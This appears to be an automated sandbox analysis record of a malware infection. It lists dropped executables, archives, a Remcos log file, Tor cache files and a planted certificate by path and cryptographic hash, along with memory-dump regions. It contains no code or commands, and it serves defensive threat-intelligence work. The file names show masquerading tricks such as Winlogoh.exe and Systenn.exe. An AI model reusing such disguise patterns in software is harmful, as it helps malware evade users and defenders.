SHA512 bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 0dc4014facf82aa027904c1be1d403c1
SHA1 5e6d6c020bfc2e6f24f3d237946b0103fe9b1831
SHA256 a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7
SHA512 cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 b7d1e04629bec112923446fda5391731
SHA1 814055286f963ddaa5bf3019821cb8a565b56cb8
SHA256 4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789
SHA512 79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

MD5 d68f79c459ee4ae03b76fa5ba151a41f
SHA1 bfa641085d59d58993ba98ac9ee376f898ee5f7b
SHA256 aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6
SHA512 bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e

memory/1996-115-0x00007FF74E900000-0x00007FF74ED90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\in.exe

MD5 83d75087c9bf6e4f07c36e550731ccde
SHA1 d5ff596961cce5f03f842cfd8f27dde6f124e3ae
SHA256 46db3164bebffc61c201fe1e086bffe129ddfed575e6d839ddb4f9622963fb3f
SHA512 044e1f5507e92715ce9df8bb802e83157237a2f96f39bac3b6a444175f1160c4d82f41a0bcecf5feaf1c919272ed7929baef929a8c3f07deecebc44b0435164a

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 579a63bebccbacab8f14132f9fc31b89
SHA1 fca8a51077d352741a9c1ff8a493064ef5052f27
SHA256 0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0
SHA512 4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 5659eba6a774f9d5322f249ad989114a
SHA1 4bfb12aa98a1dc2206baa0ac611877b815810e4c
SHA256 e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4
SHA512 f93abf2787b1e06ce999a0cbc67dc787b791a58f9ce20af5587b2060d663f26be9f648d116d9ca279af39299ea5d38e3c86271297e47c1438102ca28fce8edc4

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 5404286ec7853897b3ba00adf824d6c1
SHA1 39e543e08b34311b82f6e909e1e67e2f4afec551
SHA256 ec94a6666a3103ba6be60b92e843075a2d7fe7d30fa41099c3f3b1e2a5eba266
SHA512 c4b78298c42148d393feea6c3941c48def7c92ef0e6baac99144b083937d0a80d3c15bd9a0bf40daa60919968b120d62999fa61af320e507f7e99fbfe9b9ef30

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 5eb39ba3698c99891a6b6eb036cfb653
SHA1 d2f1cdd59669f006a2f1aa9214aeed48bc88c06e
SHA256 e77f5e03ae140dda27d73e1ffe43f7911e006a108cf51cbd0e05d73aa92da7c2
SHA512 6c4ca20e88d49256ed9cabec0d1f2b00dfcf3d1603b5c95d158d4438c9f1e58495f8dfa200dbe7f49b5b0dd57886517eb3b98c4190484548720dad4b3db6069e

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 7187cc2643affab4ca29d92251c96dee
SHA1 ab0a4de90a14551834e12bb2c8c6b9ee517acaf4
SHA256 c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830
SHA512 27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3

C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\l4.exe

MD5 63c4e3f9c7383d039ab4af449372c17f
SHA1 f52ff760a098a006c41269ff73abb633b811f18e
SHA256 151524f6c1d1aeac530cfd69de15c3336043dc8eb3f5aeaa31513e24bfd7acdd
SHA512 dcfb4804c5569ad13e752270d13320f8769601b7092544741e35bc62a22af363b7a5ea7c5a65132c9575540a3e689a6946110502bd0f046385b8739e81761fbf

C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

memory/3128-133-0x0000022C15D80000-0x0000022C15DA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkomrkjx.bg5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\_socket.pyd

MD5 69801d1a0809c52db984602ca2653541
SHA1 0f6e77086f049a7c12880829de051dcbe3d66764
SHA256 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3
SHA512 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\onefile_3212_133785012146184588\select.pyd

MD5 7c14c7bc02e47d5c8158383cb7e14124
SHA1 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3
SHA256 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5
SHA512 af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe

MD5 12c766cab30c7a0ef110f0199beda18b
SHA1 efdc8eb63df5aae563c7153c3bd607812debeba4
SHA256 7b2070ca45ec370acba43623fb52931ee52bee6f0ce74e6230179b058fa2c316
SHA512 32cad9086d9c7a8d88c3bfcb0806f350f0df9624637439f1e34ab2efffa0c273faef0c226c388ed28f07381aef0655af9e3eb3e9557cbfd2d8c915b556b1cf10

memory/4704-175-0x00007FFEF9FB0000-0x00007FFEFAA71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

MD5 258fbac30b692b9c6dc7037fc8d371f4
SHA1 ec2daa22663bd50b63316f1df0b24bdcf203f2d9
SHA256 1c1cc887675c501201f7074794a443c3eb56bcd3d25980e4ef65e9b69d44c427
SHA512 9a4a810cf5c9232762149e8ec4677da7d4a58835174e504614d7aea09926ab084b574dab85c060fa2306e3423112c29455806d6c32db86e401573eb3f24ce0e4

memory/3724-187-0x0000000000180000-0x00000000003F0000-memory.dmp

memory/3724-188-0x0000000004DE0000-0x0000000004E7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

MD5 3567cb15156760b2f111512ffdbc1451
SHA1 2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
SHA512 e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba

C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe

MD5 2a78ce9f3872f5e591d643459cabe476
SHA1 9ac947dfc71a868bc9c2eb2bd78dfb433067682e
SHA256 21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae
SHA512 03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

C:\Program Files\Windows Media Player\graph\graph.exe

MD5 7d254439af7b1caaa765420bea7fbd3f
SHA1 7bd1d979de4a86cb0d8c2ad9e1945bd351339ad0
SHA256 d6e7ceb5b05634efbd06c3e28233e92f1bd362a36473688fbaf952504b76d394
SHA512 c3164b2f09dc914066201562be6483f61d3c368675ac5d3466c2d5b754813b8b23fd09af86b1f15ab8cc91be8a52b3488323e7a65198e5b104f9c635ec5ed5cc

memory/4784-244-0x0000000000400000-0x00000000007BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

MD5 3b8b3018e3283830627249d26305419d
SHA1 40fa5ef5594f9e32810c023aba5b6b8cea82f680
SHA256 258e444e78225f74d47ba4698d49a33e6d1f6ed1f3f710186be426078e2bf1cb
SHA512 2e9a42e53406446b503f150abfa16b994ee34211830d14ccbfbf52d86019dc5cca95c40222e5c6aed910c90988f999560ff972c575f9c207d7834abba6f04aa0

memory/3044-274-0x0000000000400000-0x0000000000A9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

MD5 c5ad2e085a9ff5c605572215c40029e1
SHA1 252fe2d36d552bcf8752be2bdd62eb7711d3b2ab
SHA256 47c8723d2034a43fb63f89e2bcd731c99c1c316b238957720c761a0301202e05
SHA512 8878a0f2678908136158f3a6d88393e6831dfe1e64aa82adbb17c26b223381d5ac166dc241bedd554c8dd4e687e9bee624a91fbe3d2976ddfea1d811bf26f6d4

memory/4688-285-0x0000000000410000-0x000000000052A000-memory.dmp

memory/4688-300-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-310-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-318-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-348-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-346-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-344-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-342-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-340-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-336-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-334-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-332-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-330-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-338-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-328-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-326-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-324-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-323-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-320-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-316-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-314-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-312-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-308-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-306-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-302-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-304-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-298-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-294-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-292-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-290-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-288-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-286-0x0000000004DF0000-0x0000000004F0A000-memory.dmp

memory/4688-296-0x0000000004DF0000-0x0000000004F03000-memory.dmp

memory/4688-287-0x0000000004DF0000-0x0000000004F03000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe

MD5 5950611ed70f90b758610609e2aee8e6
SHA1 798588341c108850c79da309be33495faf2f3246
SHA256 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
SHA512 7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80

memory/4688-1478-0x0000000004F90000-0x000000000501A000-memory.dmp

memory/4688-1479-0x0000000004F20000-0x0000000004F6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe

MD5 f8d528a37993ed91d2496bab9fc734d3
SHA1 4b66b225298f776e21f566b758f3897d20b23cad
SHA256 bc8458a8d78cf91129c84b153aafe8319410aacb8e14aec506897c8e0793ba02
SHA512 75dc1bbb1388f68d121bab26fc7f6bf9dc1226417ad7ed4a7b9718999aa0f9c891fed0db3c9ea6d6ccb34288cc848dc44b20ea83a30afd4ea2e99cff51f30f5a

C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe

MD5 58f824a8f6a71da8e9a1acc97fc26d52
SHA1 b0e199e6f85626edebbecd13609a011cf953df69
SHA256 5e5b808ed64c4f40e07a4894e1da294e364383f0a51adb7ec8c7568afba3eb17
SHA512 7d6c752369ea83bad34873d8603c413e9372ff66adcaad11e7f23d3ce85827e057444b30eadf927329191825aef4dc37a1e68c30b71fae4ce6f53708102fb461

memory/2916-1506-0x00000000009A0000-0x0000000000E16000-memory.dmp

memory/2220-1505-0x00000000002A0000-0x0000000000A1B000-memory.dmp

memory/2916-1507-0x00000000009A0000-0x0000000000E16000-memory.dmp

memory/2916-1508-0x00000000009A0000-0x0000000000E16000-memory.dmp

memory/3044-1511-0x0000000000400000-0x0000000000A9C000-memory.dmp

memory/5744-1541-0x00007FF670C90000-0x00007FF671120000-memory.dmp

memory/5744-1545-0x00007FF670C90000-0x00007FF671120000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe

MD5 3297554944a2e2892096a8fb14c86164
SHA1 4b700666815448a1e0f4f389135fddb3612893ec
SHA256 e0a9fcd5805e66254aa20f8ddb3bdfca376a858b19222b178cc8893f914a6495
SHA512 499aa1679f019e29b4d871a472d24b89adddc68978317f85f095c7278f25f926cbf532c8520c2f468b3942a3e37e9be20aea9f83c68e8b5e0c9adbf69640ad25

memory/2220-1554-0x00000000002A0000-0x0000000000A1B000-memory.dmp

memory/2916-1555-0x00000000009A0000-0x0000000000E16000-memory.dmp

memory/2700-1556-0x0000000000490000-0x0000000000E6C000-memory.dmp

memory/2700-1576-0x0000000000490000-0x0000000000E6C000-memory.dmp

memory/2700-1577-0x0000000000490000-0x0000000000E6C000-memory.dmp

memory/2700-1582-0x00000000075F0000-0x00000000075FA000-memory.dmp

memory/2700-1583-0x00000000078C0000-0x0000000007936000-memory.dmp

memory/2700-1590-0x00000000081B0000-0x0000000008216000-memory.dmp

memory/3724-1593-0x00000000053C0000-0x00000000053E2000-memory.dmp

memory/3724-1592-0x0000000005890000-0x0000000005E34000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\RMX.exe

MD5 87d7fffd5ec9e7bc817d31ce77dee415
SHA1 6cc44ccc0438c65cdef248cc6d76fc0d05e79222
SHA256 47ae8e5d41bbd1eb506a303584b124c3c8a1caeac4564252fa78856190f0f628
SHA512 1d2c6ec8676cb1cfbe37f808440287ea6a658d3f21829b5001c3c08a663722eb0537cc681a6faa7d39dc16a101fa2bbf55989a64a7c16143f11aa96033b886a5

memory/3724-1587-0x0000000005080000-0x00000000051E0000-memory.dmp

memory/2700-1610-0x0000000008750000-0x000000000876E000-memory.dmp

memory/2700-1611-0x0000000008820000-0x000000000888A000-memory.dmp

memory/2700-1613-0x0000000008890000-0x0000000008BE4000-memory.dmp

memory/2700-1614-0x0000000008C30000-0x0000000008C7C000-memory.dmp

memory/2700-1616-0x0000000008DD0000-0x0000000008E82000-memory.dmp

memory/2700-1617-0x0000000008EE0000-0x0000000008F30000-memory.dmp

memory/2700-1618-0x0000000008F60000-0x0000000008F82000-memory.dmp

memory/2700-1620-0x0000000008FF0000-0x000000000902C000-memory.dmp

memory/2700-1621-0x0000000008FB0000-0x0000000008FD1000-memory.dmp

memory/2700-1623-0x0000000009D40000-0x000000000A06E000-memory.dmp

memory/2700-1657-0x000000000A110000-0x000000000A1A2000-memory.dmp

memory/2700-1666-0x000000000A090000-0x000000000A0A2000-memory.dmp

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

MD5 f89267b24ecf471c16add613cec34473
SHA1 c3aad9d69a3848cedb8912e237b06d21e1e9974f
SHA256 21f12abb6de14e72d085bc0bd90d630956c399433e85275c4c144cd9818cbf92
SHA512 c29176c7e1d58dd4e1deafcbd72956b8c27e923fb79d511ee244c91777d3b3e41d0c3977a8a9fbe094bac371253481dde5b58abf4f2df989f303e5d262e1ce4d

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

MD5 53e54ac43786c11e0dde9db8f4eb27ab
SHA1 9c5768d5ee037e90da77f174ef9401970060520e
SHA256 2f606d24809902af1bb9cb59c16a2c82960d95bff923ea26f6a42076772f1db8
SHA512 cd1f6d5f4d8cd19226151b6674124ab1e10950af5a049e8c082531867d71bfae9d7bc65641171fd55d203e4fba9756c80d11906d85a30b35ee4e8991adb21950

C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe

MD5 5b39766f490f17925defaee5de2f9861
SHA1 9c89f2951c255117eb3eebcd61dbecf019a4c186
SHA256 de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a
SHA512 d216fa45c98e423f15c2b52f980fc1c439d365b9799e5063e6b09837b419d197ba68d52ea7facf469eae38e531f17bd19eaf25d170465dc41217ca6ab9eb30bf

memory/6132-1701-0x00000264A1DC0000-0x00000264A2250000-memory.dmp

memory/2700-1719-0x0000000000490000-0x0000000000E6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp8F3B.tmp

MD5 cc4bcefab93dea82839da014bc437fd6
SHA1 b229fc4e68004a0901627550cc2f7f90d8c8211d
SHA256 37cbe14071363774957592ea93789923787e8ca7e0e8631a8b87d3c2c22aca3e
SHA512 345843e5e95dc6f7ee296e77efd89a7c7424a43da3324e5f647cdd2e8c49a75eb774b5c9f735315649be868dea6008c93fded3033f37288601a6e79867fa0540

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\3791FC28BE80FE32FB148AD68059B52D91C13688

MD5 620f409f201bafbfb817e04c395f59b5
SHA1 7cc777218f60d842e10c035be68ca31380179752
SHA256 c5597d68ca229ea528e01bd3fd2771e5503c9b60bddd825c3977fcdd5dc8b5e8
SHA512 244a5917d5ab81f8b4bf4f879340ec3f0ee635f97bad2cbd76846bf68bd9b438e00599b106bd4af4aac56736104b09a2f5e564cf86e041a9981010d670d707c4

memory/4556-1774-0x0000000000400000-0x0000000000A9C000-memory.dmp

memory/4688-1775-0x00000000050D0000-0x0000000005124000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

MD5 9821fa45714f3b4538cc017320f6f7e5
SHA1 5bf0752889cefd64dab0317067d5e593ba32e507
SHA256 fd9343a395c034e519aea60471c518edbd8cf1b8a236ec924acf06348e6d3a72
SHA512 90afec395115d932ea272b11daa3245769bdcc9421ecd418722830259a64df19ed7eacca38000f6a846db9f4363817f13232032ab30f2ab1aa7e88097361d898

memory/2916-2383-0x0000000007940000-0x000000000794A000-memory.dmp

memory/6100-2982-0x00007FF79FEA0000-0x00007FF7A0330000-memory.dmp

memory/6100-2997-0x00007FF79FEA0000-0x00007FF7A0330000-memory.dmp

memory/4556-3011-0x0000000000400000-0x0000000000A9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe

MD5 4c64aec6c5d6a5c50d80decb119b3c78
SHA1 bc97a13e661537be68863667480829e12187a1d7
SHA256 75c7692c0f989e63e14c27b4fb7d25f93760068a4ca4e90fa636715432915253
SHA512 9054e3c8306999fe851b563a826ca7a87c4ba78c900cd3b445f436e8406f581e5c3437971a1f1dea3f5132c16a1b36c2dd09f2c97800d28e7157bd7dc3ac3e76

memory/380-3052-0x0000000002370000-0x00000000023A6000-memory.dmp

memory/380-3053-0x0000000005060000-0x0000000005688000-memory.dmp

memory/380-3059-0x0000000004D70000-0x0000000004DD6000-memory.dmp

memory/380-3060-0x0000000005700000-0x0000000005A54000-memory.dmp

memory/380-3076-0x0000000005C80000-0x0000000005C9E000-memory.dmp

memory/380-3077-0x0000000005CB0000-0x0000000005CFC000-memory.dmp

memory/380-3082-0x0000000070F80000-0x0000000070FCC000-memory.dmp

memory/380-3081-0x0000000006E60000-0x0000000006E92000-memory.dmp

memory/380-3092-0x0000000006260000-0x000000000627E000-memory.dmp

memory/380-3094-0x0000000006EA0000-0x0000000006F43000-memory.dmp

memory/380-3095-0x0000000007610000-0x0000000007C8A000-memory.dmp

memory/380-3096-0x0000000006FC0000-0x0000000006FDA000-memory.dmp

memory/380-3097-0x0000000007030000-0x000000000703A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\888.exe

MD5 b6e5859c20c608bf7e23a9b4f8b3b699
SHA1 302a43d218e5fd4e766d8ac439d04c5662956cc3
SHA256 bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
SHA512 60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c

memory/380-3101-0x0000000007250000-0x00000000072E6000-memory.dmp

memory/380-3105-0x00000000071C0000-0x00000000071D1000-memory.dmp

memory/380-3107-0x00000000071F0000-0x00000000071FE000-memory.dmp

memory/380-3108-0x0000000007200000-0x0000000007214000-memory.dmp

memory/380-3109-0x0000000007310000-0x000000000732A000-memory.dmp

memory/380-3110-0x0000000007240000-0x0000000007248000-memory.dmp

C:\ProgramData\Remcos\logs.dat

MD5 9c29cd7c82f92c077495a1fdef8375c5
SHA1 090a4ec9324d5cf3e276d9b1f17814a5b0a5a626
SHA256 63676f258cfd53ddaa08c165145de23fc19fb8ab9a1de63c6d42867aa4cc7786
SHA512 9220147906f7390365f5ef4d10a42fc8559d6f1148872f66ce908f47993599f17a643be42822992b37c87f4ce81a5a8eb8be8565cc34ea75e5e3533885de6f90

C:\Users\Admin\AppData\Local\Temp\a\50to.exe

MD5 47f6b0028c7d8b03e2915eb90d0d9478
SHA1 abc4adf0b050ccea35496c01f33311b84fba60c6
SHA256 c656d874c62682dd7af9ab4b7001afcc4aab15f3e0bc7cdfd9b3f40c15259e3f
SHA512 ae4e7b9a9f4832fab3fe5c7ad7fc71ae5839fd8469e3cbd2f753592853a441aa89643914eda3838cd72afd6dee029dd29dc43eaf7db3adc989beab43643951a2

memory/5032-3141-0x00000217C1CE0000-0x00000217C236E000-memory.dmp

memory/5160-4219-0x0000000004FA0000-0x0000000004FF4000-memory.dmp

C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp

MD5 abc113db2117ff8ac43397300cd06fa4
SHA1 11d9154062f0a873939f07b490faed2293f21e38
SHA256 470c7fa9880b2da9e7044fb5ae9acd47909fb1b5e508fa34ab6c2bb0bfb64b9a
SHA512 26d5a54a220eeb5f6b8ea8b536e99fafb04ebba9046c0eb0640b4f01bc89571630c2dc89df645e67d1c432a80617dab89292e9aaac6350e155eac8bcda0cfedf

C:\Users\Admin\AppData\Local\Temp\a\info.exe

MD5 ca298b43595a13e5bbb25535ead852f7
SHA1 6fc8d0e3d36b245b2eb895f512e171381a96e268
SHA256 0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e
SHA512 8c591cd0693b9516959c6d1c446f5619228021c1e7a95c208c736168cc90bc15dba47aca99aa6349f8e056a5c7f020c34b751d551260f9d3ba491b11cd953cf5

memory/1164-4297-0x0000000000400000-0x000000000197D000-memory.dmp

C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new

MD5 c448400baf17811d8355970d4def80ab
SHA1 eabff292b2216ec838ba3a8e01e5ab594b77eb26
SHA256 4e983684ac4a2e06849e45f067a5dac31114f35b46464ef5521500c7f2ded13c
SHA512 8ee9df5c2afdc4d0c13cdd600eef40722ef1fbf49e09da0e3df4e13bcf3d2ccf7990b0f216567214f6bef0858008ed1f1e81ee1d8a7c9ae9e4a81333f95b1eb0

C:\Users\Admin\AppData\Local\Temp\a\50.exe

MD5 38c56adb21dc68729fcc9b2d97d72ac1
SHA1 c08c6d344aa88b87d7741d4b249dcc937dad0cea
SHA256 7807125f9d53afac3fe1037dd8def3f039cba5f57a170526bdaaf2e0e09365fb
SHA512 c4f5a7fa9013dfe33a89dcca5640f37b5309b5ef354a5518877512bbbdc072ba8bfaebde0da3b55aacf0bdcbb443d368a3f60e91bedea6c1cc754393943ca530

memory/1164-4476-0x0000000000400000-0x000000000197D000-memory.dmp

memory/5596-4614-0x000001EA24310000-0x000001EA245AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\SH.exe

MD5 b70651a7c5ec8cc35b9c985a331ffca3
SHA1 8492a85c3122a7cac2058099fb279d36826d1f4d
SHA256 ed9d94e2dfeb610cb43d00e1a9d8eec18547f1bca2f489605f0586969f6cd6d6
SHA512 3819216764b29dad3fabfab42f25f97fb38d0f24b975366426ce3e345092fc446ff13dd93ab73d252ea5f77a7fc055ad251e7017f65d4de09b0c43601b5d3fd5

memory/4584-4676-0x00000000001F0000-0x00000000002FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe

MD5 a9255b6f4acf2ed0be0f908265865276
SHA1 526591216c42b2ba177fcb927feee22267a2235d
SHA256 3f25f1c33d0711c5cc773b0e7a6793d2ae57e3bf918b176e2fa1afad55a7337a
SHA512 86d6eaf7d07168c3898ef0516bbd60ef0a2f5be097a979deb37cea90c71daff92da311c138d717e4bb542de1dbd88ef1b6f745b9acbfb23456dd59119d556a50

memory/5204-4712-0x000002DAE33F0000-0x000002DAE3442000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3246.tmp.dat

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe

MD5 230f75b72d5021a921637929a63cfd79
SHA1 71af2ee3489d49914f7c7fa4e16e8398e97e0fc8
SHA256 a5011c165dbd8459396a3b4f901c7faa668e95e395fb12d7c967c34c0d974355
SHA512 3dc11aac2231daf30871d30f43eba3eadf14f3b003dd1f81466cde021b0b59d38c5e9a320e6705b4f5a0eeebf93f9ee5459173e20de2ab3ae3f3e9988819f001

C:\Users\Admin\AppData\Local\Temp\tmp3245.tmp.dat

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

